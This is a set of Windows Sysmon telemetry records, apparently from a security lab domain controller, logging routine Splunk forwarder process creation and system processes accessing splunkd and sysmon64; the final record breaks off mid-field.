{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.631\r\nProcessGuid: {A837DB8D-0239-5F25-0000-001000270500}\r\nProcessId: 4260\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-00103F260500}\r\nParentProcessId: 4204\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.631","ProcessGuid":"{A837DB8D-0239-5F25-0000-001000270500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-00103F260500}","ParentProcessId":"4204","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F260500}\r\nSourceProcessId: 4204\r\nSourceThreadId: 4224\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001000270500}\r\nTargetProcessId: 4260\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F260500}","SourceProcessId":"4204","SourceThreadId":"4224","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001000270500}","TargetProcessId":"4260","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001000270500}\r\nTargetProcessId: 4260\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001000270500}","TargetProcessId":"4260","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 